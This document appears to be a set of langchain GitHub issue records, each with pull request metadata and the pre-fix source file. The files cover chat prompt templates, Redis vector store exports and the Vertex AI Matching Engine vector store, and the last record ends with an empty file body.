### Issue with current documentation: [AIMessagePromptTemplate documentation](https://api.python.langchain.com/en/latest/prompts/langchain.prompts.chat.AIMessagePromptTemplate.html#langchain-prompts-chat-aimessageprompttemplate) incorrectly and confusingly describes the message as "... This is a message that is not sent to the user." [HumanMessagePromptTemplate documentation](https://api.python.langchain.com/en/latest/prompts/langchain.prompts.chat.HumanMessagePromptTemplate.html#langchain-prompts-chat-humanmessageprompttemplate) incorrectly and confusingly describes the message as "... This is a message that is sent to the user." Compare to the documentation for [AIMessage](https://api.python.langchain.com/en/latest/schema/langchain.schema.messages.AIMessage.html#langchain-schema-messages-aimessage) and [HumanMessage](https://api.python.langchain.com/en/latest/schema/langchain.schema.messages.HumanMessage.html#langchain-schema-messages-humanmessage), which correctly and clearly describe each message as "A message from an AI" and "A message from a human." respectively. ### Idea or request for content: AIMessagePromptTemplate should be described as "AI message prompt template. This is a message that is sent to the user from the AI." HumanMessagePromptTemplate should be described as "Human message prompt template. This is a message that is sent from the user to the AI." These are clear, concise and consistent with documentation of the message schema. I will submit a PR with revised docstrings for each class. This should, then, be reflected in the API reference documentation upon next build.
https://github.com/langchain-ai/langchain/issues/10378
https://github.com/langchain-ai/langchain/pull/10379
8c0f391815eac61f2b5d1b993e9bc4795808696f
c902a1545bfbc3015defcd1c3ee435d38db4ee34
"2023-09-08T16:43:51Z"
python
"2023-09-08T22:53:08Z"
libs/langchain/langchain/prompts/chat.py
"""Chat prompt template.""" from __future__ import annotations from abc import ABC, abstractmethod from pathlib import Path from typing import ( Any, Callable, Dict, List, Sequence, Set, Tuple, Type, TypeVar, Union, overload, ) from langchain._api import deprecated from langchain.load.serializable import Serializable from langchain.prompts.base import StringPromptTemplate from langchain.prompts.prompt import PromptTemplate from langchain.pydantic_v1 import Field, root_validator from langchain.schema import ( BasePromptTemplate, PromptValue, ) from langchain.schema.messages import ( AIMessage, BaseMessage, ChatMessage, HumanMessage, SystemMessage, get_buffer_string, ) class BaseMessagePromptTemplate(Serializable, ABC): """Base class for message prompt templates.""" @property def lc_serializable(self) -> bool: """Whether this object should be serialized. Returns: Whether this object should be serialized. """ return True @abstractmethod def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format messages from kwargs. Should return a list of BaseMessages. Args: **kwargs: Keyword arguments to use for formatting. Returns: List of BaseMessages. """ @property @abstractmethod def input_variables(self) -> List[str]: """Input variables for this prompt template. Returns: List of input variables. """ def __add__(self, other: Any) -> ChatPromptTemplate: """Combine two prompt templates. Args: other: Another prompt template. Returns: Combined prompt template. """ prompt = ChatPromptTemplate(messages=[self]) return prompt + other class MessagesPlaceholder(BaseMessagePromptTemplate): """Prompt template that assumes variable is already list of messages.""" variable_name: str """Name of variable to use as messages.""" def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format messages from kwargs. Args: **kwargs: Keyword arguments to use for formatting. Returns: List of BaseMessage. """ value = kwargs[self.variable_name] if not isinstance(value, list): raise ValueError( f"variable {self.variable_name} should be a list of base messages, " f"got {value}" ) for v in value: if not isinstance(v, BaseMessage): raise ValueError( f"variable {self.variable_name} should be a list of base messages," f" got {value}" ) return value @property def input_variables(self) -> List[str]: """Input variables for this prompt template. Returns: List of input variable names. """ return [self.variable_name] MessagePromptTemplateT = TypeVar( "MessagePromptTemplateT", bound="BaseStringMessagePromptTemplate" ) """Type variable for message prompt templates.""" class BaseStringMessagePromptTemplate(BaseMessagePromptTemplate, ABC): """Base class for message prompt templates that use a string prompt template.""" prompt: StringPromptTemplate """String prompt template.""" additional_kwargs: dict = Field(default_factory=dict) """Additional keyword arguments to pass to the prompt template.""" @classmethod def from_template( cls: Type[MessagePromptTemplateT], template: str, template_format: str = "f-string", **kwargs: Any, ) -> MessagePromptTemplateT: """Create a class from a string template. Args: template: a template. template_format: format of the template. **kwargs: keyword arguments to pass to the constructor. Returns: A new instance of this class. """ prompt = PromptTemplate.from_template(template, template_format=template_format) return cls(prompt=prompt, **kwargs) @classmethod def from_template_file( cls: Type[MessagePromptTemplateT], template_file: Union[str, Path], input_variables: List[str], **kwargs: Any, ) -> MessagePromptTemplateT: """Create a class from a template file. Args: template_file: path to a template file. String or Path. input_variables: list of input variables. **kwargs: keyword arguments to pass to the constructor. Returns: A new instance of this class. """ prompt = PromptTemplate.from_file(template_file, input_variables) return cls(prompt=prompt, **kwargs) @abstractmethod def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format messages from kwargs. Args: **kwargs: Keyword arguments to use for formatting. Returns: List of BaseMessages. """ return [self.format(**kwargs)] @property def input_variables(self) -> List[str]: """ Input variables for this prompt template. Returns: List of input variable names. """ return self.prompt.input_variables class ChatMessagePromptTemplate(BaseStringMessagePromptTemplate): """Chat message prompt template.""" role: str """Role of the message.""" def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return ChatMessage( content=text, role=self.role, additional_kwargs=self.additional_kwargs ) class HumanMessagePromptTemplate(BaseStringMessagePromptTemplate): """Human message prompt template. This is a message that is sent to the user.""" def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return HumanMessage(content=text, additional_kwargs=self.additional_kwargs) class AIMessagePromptTemplate(BaseStringMessagePromptTemplate): """AI message prompt template. This is a message that is not sent to the user.""" def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return AIMessage(content=text, additional_kwargs=self.additional_kwargs) class SystemMessagePromptTemplate(BaseStringMessagePromptTemplate): """System message prompt template. This is a message that is not sent to the user. """ def format(self, **kwargs: Any) -> BaseMessage: """Format the prompt template. Args: **kwargs: Keyword arguments to use for formatting. Returns: Formatted message. """ text = self.prompt.format(**kwargs) return SystemMessage(content=text, additional_kwargs=self.additional_kwargs) class ChatPromptValue(PromptValue): """Chat prompt value. A type of a prompt value that is built from messages. """ messages: List[BaseMessage] """List of messages.""" def to_string(self) -> str: """Return prompt as string.""" return get_buffer_string(self.messages) def to_messages(self) -> List[BaseMessage]: """Return prompt as a list of messages.""" return self.messages class BaseChatPromptTemplate(BasePromptTemplate, ABC): """Base class for chat prompt templates.""" @property def lc_attributes(self) -> Dict: """ Return a list of attribute names that should be included in the serialized kwargs. These attributes must be accepted by the constructor. """ return {"input_variables": self.input_variables} def format(self, **kwargs: Any) -> str: """Format the chat template into a string. Args: **kwargs: keyword arguments to use for filling in template variables in all the template messages in this chat template. Returns: formatted string """ return self.format_prompt(**kwargs).to_string() def format_prompt(self, **kwargs: Any) -> PromptValue: """ Format prompt. Should return a PromptValue. Args: **kwargs: Keyword arguments to use for formatting. Returns: PromptValue. """ messages = self.format_messages(**kwargs) return ChatPromptValue(messages=messages) @abstractmethod def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format kwargs into a list of messages.""" MessageLike = Union[BaseMessagePromptTemplate, BaseMessage, BaseChatPromptTemplate] MessageLikeRepresentation = Union[ MessageLike, Tuple[str, str], Tuple[Type, str], str, ] class ChatPromptTemplate(BaseChatPromptTemplate): """A prompt template for chat models. Use to create flexible templated prompts for chat models. Examples: .. code-block:: python from langchain.prompts import ChatPromptTemplate template = ChatPromptTemplate.from_messages([ ("system", "You are a helpful AI bot. Your name is {name}."), ("human", "Hello, how are you doing?"), ("ai", "I'm doing well, thanks!"), ("human", "{user_input}"), ]) messages = template.format_messages( name="Bob", user_input="What is your name?" ) """ input_variables: List[str] """List of input variables in template messages. Used for validation.""" messages: List[MessageLike] """List of messages consisting of either message prompt templates or messages.""" def __add__(self, other: Any) -> ChatPromptTemplate: """Combine two prompt templates. Args: other: Another prompt template. Returns: Combined prompt template. """ # Allow for easy combining if isinstance(other, ChatPromptTemplate): return ChatPromptTemplate(messages=self.messages + other.messages) elif isinstance( other, (BaseMessagePromptTemplate, BaseMessage, BaseChatPromptTemplate) ): return ChatPromptTemplate(messages=self.messages + [other]) elif isinstance(other, (list, tuple)): _other = ChatPromptTemplate.from_messages(other) return ChatPromptTemplate(messages=self.messages + _other.messages) elif isinstance(other, str): prompt = HumanMessagePromptTemplate.from_template(other) return ChatPromptTemplate(messages=self.messages + [prompt]) else: raise NotImplementedError(f"Unsupported operand type for +: {type(other)}") @root_validator(pre=True) def validate_input_variables(cls, values: dict) -> dict: """Validate input variables. If input_variables is not set, it will be set to the union of all input variables in the messages. Args: values: values to validate. Returns: Validated values. """ messages = values["messages"] input_vars = set() for message in messages: if isinstance(message, (BaseMessagePromptTemplate, BaseChatPromptTemplate)): input_vars.update(message.input_variables) if "partial_variables" in values: input_vars = input_vars - set(values["partial_variables"]) if "input_variables" in values: if input_vars != set(values["input_variables"]): raise ValueError( "Got mismatched input_variables. " f"Expected: {input_vars}. " f"Got: {values['input_variables']}" ) else: values["input_variables"] = sorted(input_vars) return values @classmethod def from_template(cls, template: str, **kwargs: Any) -> ChatPromptTemplate: """Create a chat prompt template from a template string. Creates a chat template consisting of a single message assumed to be from the human. Args: template: template string **kwargs: keyword arguments to pass to the constructor. Returns: A new instance of this class. """ prompt_template = PromptTemplate.from_template(template, **kwargs) message = HumanMessagePromptTemplate(prompt=prompt_template) return cls.from_messages([message]) @classmethod @deprecated("0.0.260", alternative="from_messages classmethod", pending=True) def from_role_strings( cls, string_messages: List[Tuple[str, str]] ) -> ChatPromptTemplate: """Create a chat prompt template from a list of (role, template) tuples. Args: string_messages: list of (role, template) tuples. Returns: a chat prompt template """ return cls( messages=[ ChatMessagePromptTemplate.from_template(template, role=role) for role, template in string_messages ] ) @classmethod @deprecated("0.0.260", alternative="from_messages classmethod", pending=True) def from_strings( cls, string_messages: List[Tuple[Type[BaseMessagePromptTemplate], str]] ) -> ChatPromptTemplate: """Create a chat prompt template from a list of (role class, template) tuples. Args: string_messages: list of (role class, template) tuples. Returns: a chat prompt template """ return cls.from_messages(string_messages) @classmethod def from_messages( cls, messages: Sequence[MessageLikeRepresentation], ) -> ChatPromptTemplate: """Create a chat prompt template from a variety of message formats. Examples: Instantiation from a list of message templates: .. code-block:: python template = ChatPromptTemplate.from_messages([ ("human", "Hello, how are you?"), ("ai", "I'm doing well, thanks!"), ("human", "That's good to hear."), ]) Instantiation from mixed message formats: .. code-block:: python template = ChatPromptTemplate.from_messages([ SystemMessage(content="hello"), ("human", "Hello, how are you?"), ]) Args: messages: sequence of message representations. A message can be represented using the following formats: (1) BaseMessagePromptTemplate, (2) BaseMessage, (3) 2-tuple of (message type, template); e.g., ("human", "{user_input}"), (4) 2-tuple of (message class, template), (4) a string which is shorthand for ("human", template); e.g., "{user_input}" Returns: a chat prompt template """ _messages = [_convert_to_message(message) for message in messages] # Automatically infer input variables from messages input_vars: Set[str] = set() for _message in _messages: if isinstance( _message, (BaseChatPromptTemplate, BaseMessagePromptTemplate) ): input_vars.update(_message.input_variables) return cls(input_variables=sorted(input_vars), messages=_messages) def format(self, **kwargs: Any) -> str: """Format the chat template into a string. Args: **kwargs: keyword arguments to use for filling in template variables in all the template messages in this chat template. Returns: formatted string """ return self.format_prompt(**kwargs).to_string() def format_messages(self, **kwargs: Any) -> List[BaseMessage]: """Format the chat template into a list of finalized messages. Args: **kwargs: keyword arguments to use for filling in template variables in all the template messages in this chat template. Returns: list of formatted messages """ kwargs = self._merge_partial_and_user_variables(**kwargs) result = [] for message_template in self.messages: if isinstance(message_template, BaseMessage): result.extend([message_template]) elif isinstance( message_template, (BaseMessagePromptTemplate, BaseChatPromptTemplate) ): rel_params = { k: v for k, v in kwargs.items() if k in message_template.input_variables } message = message_template.format_messages(**rel_params) result.extend(message) else: raise ValueError(f"Unexpected input: {message_template}") return result def partial(self, **kwargs: Union[str, Callable[[], str]]) -> ChatPromptTemplate: """Get a new ChatPromptTemplate with some input variables already filled in. Args: **kwargs: keyword arguments to use for filling in template variables. Ought to be a subset of the input variables. Returns: A new ChatPromptTemplate. Example: .. code-block:: python from langchain.prompts import ChatPromptTemplate template = ChatPromptTemplate.from_messages( [ ("system", "You are an AI assistant named {name}."), ("human", "Hi I'm {user}"), ("ai", "Hi there, {user}, I'm {name}."), ("human", "{input}"), ] ) template2 = template.partial(user="Lucy", name="R2D2") template2.format_messages(input="hello") """ prompt_dict = self.__dict__.copy() prompt_dict["input_variables"] = list( set(self.input_variables).difference(kwargs) ) prompt_dict["partial_variables"] = {**self.partial_variables, **kwargs} return type(self)(**prompt_dict) def append(self, message: MessageLikeRepresentation) -> None: """Append message to the end of the chat template. Args: message: representation of a message to append. """ self.messages.append(_convert_to_message(message)) def extend(self, messages: Sequence[MessageLikeRepresentation]) -> None: """Extend the chat template with a sequence of messages.""" self.messages.extend([_convert_to_message(message) for message in messages]) @overload def __getitem__(self, index: int) -> MessageLike: ... @overload def __getitem__(self, index: slice) -> ChatPromptTemplate: ... def __getitem__( self, index: Union[int, slice] ) -> Union[MessageLike, ChatPromptTemplate]: """Use to index into the chat template.""" if isinstance(index, slice): start, stop, step = index.indices(len(self.messages)) messages = self.messages[start:stop:step] return ChatPromptTemplate.from_messages(messages) else: return self.messages[index] def __len__(self) -> int: """Get the length of the chat template.""" return len(self.messages) @property def _prompt_type(self) -> str: """Name of prompt type.""" return "chat" def save(self, file_path: Union[Path, str]) -> None: """Save prompt to file. Args: file_path: path to file. """ raise NotImplementedError() def _create_template_from_message_type( message_type: str, template: str ) -> BaseMessagePromptTemplate: """Create a message prompt template from a message type and template string. Args: message_type: str the type of the message template (e.g., "human", "ai", etc.) template: str the template string. Returns: a message prompt template of the appropriate type. """ if message_type in ("human", "user"): message: BaseMessagePromptTemplate = HumanMessagePromptTemplate.from_template( template ) elif message_type in ("ai", "assistant"): message = AIMessagePromptTemplate.from_template(template) elif message_type == "system": message = SystemMessagePromptTemplate.from_template(template) else: raise ValueError( f"Unexpected message type: {message_type}. Use one of 'human'," f" 'user', 'ai', 'assistant', or 'system'." ) return message def _convert_to_message( message: MessageLikeRepresentation, ) -> Union[BaseMessage, BaseMessagePromptTemplate, BaseChatPromptTemplate]: """Instantiate a message from a variety of message formats. The message format can be one of the following: - BaseMessagePromptTemplate - BaseMessage - 2-tuple of (role string, template); e.g., ("human", "{user_input}") - 2-tuple of (message class, template) - string: shorthand for ("human", template); e.g., "{user_input}" Args: message: a representation of a message in one of the supported formats Returns: an instance of a message or a message template """ if isinstance(message, (BaseMessagePromptTemplate, BaseChatPromptTemplate)): _message: Union[ BaseMessage, BaseMessagePromptTemplate, BaseChatPromptTemplate ] = message elif isinstance(message, BaseMessage): _message = message elif isinstance(message, str): _message = _create_template_from_message_type("human", message) elif isinstance(message, tuple): if len(message) != 2: raise ValueError(f"Expected 2-tuple of (role, template), got {message}") message_type_str, template = message if isinstance(message_type_str, str): _message = _create_template_from_message_type(message_type_str, template) else: _message = message_type_str(prompt=PromptTemplate.from_template(template)) else: raise NotImplementedError(f"Unsupported message type: {type(message)}") return _message
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,186
Issue: RedisVectorStoreRetriever not accessible
### Issue you'd like to raise. After PR [#8612](https://github.com/langchain-ai/langchain/pull/8612), access to [RedisVectorStoreRetriever](https://github.com/langchain-ai/langchain/blob/27944cb611ee8face34fbe764c83e37841f96eb7/libs/langchain/langchain/vectorstores/redis/base.py#L1293) has been removed ### Suggestion: Include **RedisVectorStoreRetriever** import in [redis/__init__.py](https://github.com/langchain-ai/langchain/blob/27944cb611ee8face34fbe764c83e37841f96eb7/libs/langchain/langchain/vectorstores/redis/__init__.py) on line 1 current: `from .base import Redis` suggestion update: `from .base import Redis, RedisVectorStoreRetriever`
https://github.com/langchain-ai/langchain/issues/10186
https://github.com/langchain-ai/langchain/pull/10414
d09ef9eb52466f991fc155567f234e5351f20d06
65e1606daa696e2190fcb410f190c6811f9f8dc3
"2023-09-04T14:21:34Z"
python
"2023-09-10T00:46:34Z"
libs/langchain/langchain/vectorstores/redis/__init__.py
from .base import Redis from .filters import ( RedisFilter, RedisNum, RedisTag, RedisText, ) __all__ = ["Redis", "RedisFilter", "RedisTag", "RedisText", "RedisNum"]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
8,378
GCP Matching Engine support for public index endpoints
### System Info langchain==0.0.244 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Create a new Matching Engine Index Endpoint that is public. Follow the tutorial to make a similarity search: ``` vector_store = MatchingEngine.from_components( project_id="", region="us-central1", gcs_bucket_name="", index_id="", endpoint_id="", embedding=embeddings, ) vector_store.similarity_search("what is a cat?", k=5) ``` Error: ``` File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:1030, in _UnaryUnaryMultiCallable.__call__(self, request, timeout, metadata, credentials, wait_for_ready, compression) 1021 def __call__(self, 1022 request: Any, 1023 timeout: Optional[float] = None, (...) 1026 wait_for_ready: Optional[bool] = None, 1027 compression: Optional[grpc.Compression] = None) -> Any: 1028 state, call, = self._blocking(request, timeout, metadata, credentials, 1029 wait_for_ready, compression) -> 1030 return _end_unary_response_blocking(state, call, False, None) File ~/code/gcp-langchain-retrieval-augmentation/embeddings/.venv/lib/python3.9/site-packages/grpc/_channel.py:910, in _end_unary_response_blocking(state, call, with_call, deadline) 908 return state.response 909 else: --> 910 raise _InactiveRpcError(state) _InactiveRpcError: <_InactiveRpcError of RPC that terminated with: status = StatusCode.UNAVAILABLE details = "DNS resolution failed for :10000: unparseable host:port" debug_error_string = "UNKNOWN:DNS resolution failed for :10000: unparseable host:port {created_time:"2023-07-27T20:12:23.727315699+00:00", grpc_status:14}" > ``` ### Expected behavior It should be possible to do this. The VertexAI Python SDK supports it with the `endpoint.find_neighbors` function. I think just changing [the wrapper](https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/vectorstores/matching_engine.py#L178) from `.match` to `.find_neighbors` for when the endpoint is public should do it.
https://github.com/langchain-ai/langchain/issues/8378
https://github.com/langchain-ai/langchain/pull/10056
4f19ba306597eb753ea397d4b646dc75c2668cbe
21b236e5e4fc5c6e22bab61967b6e56895c4fa15
"2023-07-27T20:14:21Z"
python
"2023-09-19T23:16:04Z"
libs/langchain/langchain/vectorstores/matching_engine.py
from __future__ import annotations import json import logging import time import uuid from typing import TYPE_CHECKING, Any, Iterable, List, Optional, Type from langchain.docstore.document import Document from langchain.embeddings import TensorflowHubEmbeddings from langchain.schema.embeddings import Embeddings from langchain.vectorstores.base import VectorStore if TYPE_CHECKING: from google.cloud import storage from google.cloud.aiplatform import MatchingEngineIndex, MatchingEngineIndexEndpoint from google.oauth2.service_account import Credentials logger = logging.getLogger() class MatchingEngine(VectorStore): """`Google Vertex AI Matching Engine` vector store. While the embeddings are stored in the Matching Engine, the embedded documents will be stored in GCS. An existing Index and corresponding Endpoint are preconditions for using this module. See usage in docs/modules/indexes/vectorstores/examples/matchingengine.ipynb Note that this implementation is mostly meant for reading if you are planning to do a real time implementation. While reading is a real time operation, updating the index takes close to one hour.""" def __init__( self, project_id: str, index: MatchingEngineIndex, endpoint: MatchingEngineIndexEndpoint, embedding: Embeddings, gcs_client: storage.Client, gcs_bucket_name: str, credentials: Optional[Credentials] = None, ): """Vertex Matching Engine implementation of the vector store. While the embeddings are stored in the Matching Engine, the embedded documents will be stored in GCS. An existing Index and corresponding Endpoint are preconditions for using this module. See usage in docs/modules/indexes/vectorstores/examples/matchingengine.ipynb. Note that this implementation is mostly meant for reading if you are planning to do a real time implementation. While reading is a real time operation, updating the index takes close to one hour. Attributes: project_id: The GCS project id. index: The created index class. See ~:func:`MatchingEngine.from_components`. endpoint: The created endpoint class. See ~:func:`MatchingEngine.from_components`. embedding: A :class:`Embeddings` that will be used for embedding the text sent. If none is sent, then the multilingual Tensorflow Universal Sentence Encoder will be used. gcs_client: The GCS client. gcs_bucket_name: The GCS bucket name. credentials (Optional): Created GCP credentials. """ super().__init__() self._validate_google_libraries_installation() self.project_id = project_id self.index = index self.endpoint = endpoint self.embedding = embedding self.gcs_client = gcs_client self.credentials = credentials self.gcs_bucket_name = gcs_bucket_name @property def embeddings(self) -> Embeddings: return self.embedding def _validate_google_libraries_installation(self) -> None: """Validates that Google libraries that are needed are installed.""" try: from google.cloud import aiplatform, storage # noqa: F401 from google.oauth2 import service_account # noqa: F401 except ImportError: raise ImportError( "You must run `pip install --upgrade " "google-cloud-aiplatform google-cloud-storage`" "to use the MatchingEngine Vectorstore." ) def add_texts( self, texts: Iterable[str], metadatas: Optional[List[dict]] = None, **kwargs: Any, ) -> List[str]: """Run more texts through the embeddings and add to the vectorstore. Args: texts: Iterable of strings to add to the vectorstore. metadatas: Optional list of metadatas associated with the texts. kwargs: vectorstore specific parameters. Returns: List of ids from adding the texts into the vectorstore. """ logger.debug("Embedding documents.") embeddings = self.embedding.embed_documents(list(texts)) jsons = [] ids = [] # Could be improved with async. for embedding, text in zip(embeddings, texts): id = str(uuid.uuid4()) ids.append(id) jsons.append({"id": id, "embedding": embedding}) self._upload_to_gcs(text, f"documents/{id}") logger.debug(f"Uploaded {len(ids)} documents to GCS.") # Creating json lines from the embedded documents. result_str = "\n".join([json.dumps(x) for x in jsons]) filename_prefix = f"indexes/{uuid.uuid4()}" filename = f"{filename_prefix}/{time.time()}.json" self._upload_to_gcs(result_str, filename) logger.debug( f"Uploaded updated json with embeddings to " f"{self.gcs_bucket_name}/{filename}." ) self.index = self.index.update_embeddings( contents_delta_uri=f"gs://{self.gcs_bucket_name}/{filename_prefix}/" ) logger.debug("Updated index with new configuration.") return ids def _upload_to_gcs(self, data: str, gcs_location: str) -> None: """Uploads data to gcs_location. Args: data: The data that will be stored. gcs_location: The location where the data will be stored. """ bucket = self.gcs_client.get_bucket(self.gcs_bucket_name) blob = bucket.blob(gcs_location) blob.upload_from_string(data) def similarity_search( self, query: str, k: int = 4, **kwargs: Any ) -> List[Document]: """Return docs most similar to query. Args: query: The string that will be used to search for similar documents. k: The amount of neighbors that will be retrieved. Returns: A list of k matching documents. """ logger.debug(f"Embedding query {query}.") embedding_query = self.embedding.embed_documents([query]) response = self.endpoint.match( deployed_index_id=self._get_index_id(), queries=embedding_query, num_neighbors=k, ) if len(response) == 0: return [] logger.debug(f"Found {len(response)} matches for the query {query}.") results = [] # I'm only getting the first one because queries receives an array # and the similarity_search method only receives one query. This # means that the match method will always return an array with only # one element. for doc in response[0]: page_content = self._download_from_gcs(f"documents/{doc.id}") results.append(Document(page_content=page_content)) logger.debug("Downloaded documents for query.") return results def _get_index_id(self) -> str: """Gets the correct index id for the endpoint. Returns: The index id if found (which should be found) or throws ValueError otherwise. """ for index in self.endpoint.deployed_indexes: if index.index == self.index.resource_name: return index.id raise ValueError( f"No index with id {self.index.resource_name} " f"deployed on endpoint " f"{self.endpoint.display_name}." ) def _download_from_gcs(self, gcs_location: str) -> str: """Downloads from GCS in text format. Args: gcs_location: The location where the file is located. Returns: The string contents of the file. """ bucket = self.gcs_client.get_bucket(self.gcs_bucket_name) blob = bucket.blob(gcs_location) return blob.download_as_string() @classmethod def from_texts( cls: Type["MatchingEngine"], texts: List[str], embedding: Embeddings, metadatas: Optional[List[dict]] = None, **kwargs: Any, ) -> "MatchingEngine": """Use from components instead.""" raise NotImplementedError( "This method is not implemented. Instead, you should initialize the class" " with `MatchingEngine.from_components(...)` and then call " "`add_texts`" ) @classmethod def from_components( cls: Type["MatchingEngine"], project_id: str, region: str, gcs_bucket_name: str, index_id: str, endpoint_id: str, credentials_path: Optional[str] = None, embedding: Optional[Embeddings] = None, ) -> "MatchingEngine": """Takes the object creation out of the constructor. Args: project_id: The GCP project id. region: The default location making the API calls. It must have the same location as the GCS bucket and must be regional. gcs_bucket_name: The location where the vectors will be stored in order for the index to be created. index_id: The id of the created index. endpoint_id: The id of the created endpoint. credentials_path: (Optional) The path of the Google credentials on the local file system. embedding: The :class:`Embeddings` that will be used for embedding the texts. Returns: A configured MatchingEngine with the texts added to the index. """ gcs_bucket_name = cls._validate_gcs_bucket(gcs_bucket_name) credentials = cls._create_credentials_from_file(credentials_path) index = cls._create_index_by_id(index_id, project_id, region, credentials) endpoint = cls._create_endpoint_by_id( endpoint_id, project_id, region, credentials ) gcs_client = cls._get_gcs_client(credentials, project_id) cls._init_aiplatform(project_id, region, gcs_bucket_name, credentials) return cls( project_id=project_id, index=index, endpoint=endpoint, embedding=embedding or cls._get_default_embeddings(), gcs_client=gcs_client, credentials=credentials, gcs_bucket_name=gcs_bucket_name, ) @classmethod def _validate_gcs_bucket(cls, gcs_bucket_name: str) -> str: """Validates the gcs_bucket_name as a bucket name. Args: gcs_bucket_name: The received bucket uri. Returns: A valid gcs_bucket_name or throws ValueError if full path is provided. """ gcs_bucket_name = gcs_bucket_name.replace("gs://", "") if "/" in gcs_bucket_name: raise ValueError( f"The argument gcs_bucket_name should only be " f"the bucket name. Received {gcs_bucket_name}" ) return gcs_bucket_name @classmethod def _create_credentials_from_file( cls, json_credentials_path: Optional[str] ) -> Optional[Credentials]: """Creates credentials for GCP. Args: json_credentials_path: The path on the file system where the credentials are stored. Returns: An optional of Credentials or None, in which case the default will be used. """ from google.oauth2 import service_account credentials = None if json_credentials_path is not None: credentials = service_account.Credentials.from_service_account_file( json_credentials_path ) return credentials @classmethod def _create_index_by_id( cls, index_id: str, project_id: str, region: str, credentials: "Credentials" ) -> MatchingEngineIndex: """Creates a MatchingEngineIndex object by id. Args: index_id: The created index id. project_id: The project to retrieve index from. region: Location to retrieve index from. credentials: GCS credentials. Returns: A configured MatchingEngineIndex. """ from google.cloud import aiplatform logger.debug(f"Creating matching engine index with id {index_id}.") return aiplatform.MatchingEngineIndex( index_name=index_id, project=project_id, location=region, credentials=credentials, ) @classmethod def _create_endpoint_by_id( cls, endpoint_id: str, project_id: str, region: str, credentials: "Credentials" ) -> MatchingEngineIndexEndpoint: """Creates a MatchingEngineIndexEndpoint object by id. Args: endpoint_id: The created endpoint id. project_id: The project to retrieve index from. region: Location to retrieve index from. credentials: GCS credentials. Returns: A configured MatchingEngineIndexEndpoint. """ from google.cloud import aiplatform logger.debug(f"Creating endpoint with id {endpoint_id}.") return aiplatform.MatchingEngineIndexEndpoint( index_endpoint_name=endpoint_id, project=project_id, location=region, credentials=credentials, ) @classmethod def _get_gcs_client( cls, credentials: "Credentials", project_id: str ) -> "storage.Client": """Lazily creates a GCS client. Returns: A configured GCS client. """ from google.cloud import storage return storage.Client(credentials=credentials, project=project_id) @classmethod def _init_aiplatform( cls, project_id: str, region: str, gcs_bucket_name: str, credentials: "Credentials", ) -> None: """Configures the aiplatform library. Args: project_id: The GCP project id. region: The default location making the API calls. It must have the same location as the GCS bucket and must be regional. gcs_bucket_name: GCS staging location. credentials: The GCS Credentials object. """ from google.cloud import aiplatform logger.debug( f"Initializing AI Platform for project {project_id} on " f"{region} and for {gcs_bucket_name}." ) aiplatform.init( project=project_id, location=region, staging_bucket=gcs_bucket_name, credentials=credentials, ) @classmethod def _get_default_embeddings(cls) -> TensorflowHubEmbeddings: """This function returns the default embedding. Returns: Default TensorflowHubEmbeddings to use. """ return TensorflowHubEmbeddings()
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,806
Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct
### System Info LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct) ### Who can help? @hwchase17 @agola ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [X] LLMs/Chat Models - [ ] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction Minimal code to reproduce: ```python # load OpenAI API Key from langchain.llms import OpenAI llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1) llm("give me a list of Chinese dishes and their recipes") ``` Error message: >```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001``` Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555 ### Expected behavior The code succeeds without error
https://github.com/langchain-ai/langchain/issues/10806
https://github.com/langchain-ai/langchain/pull/10808
5d0493f6521a9ab8459e7dcd92828a0353e7d706
c15bbaac3186a41bb74b314e82eb0227fdc9e332
"2023-09-19T23:26:18Z"
python
"2023-09-20T00:03:16Z"
libs/langchain/langchain/llms/openai.py
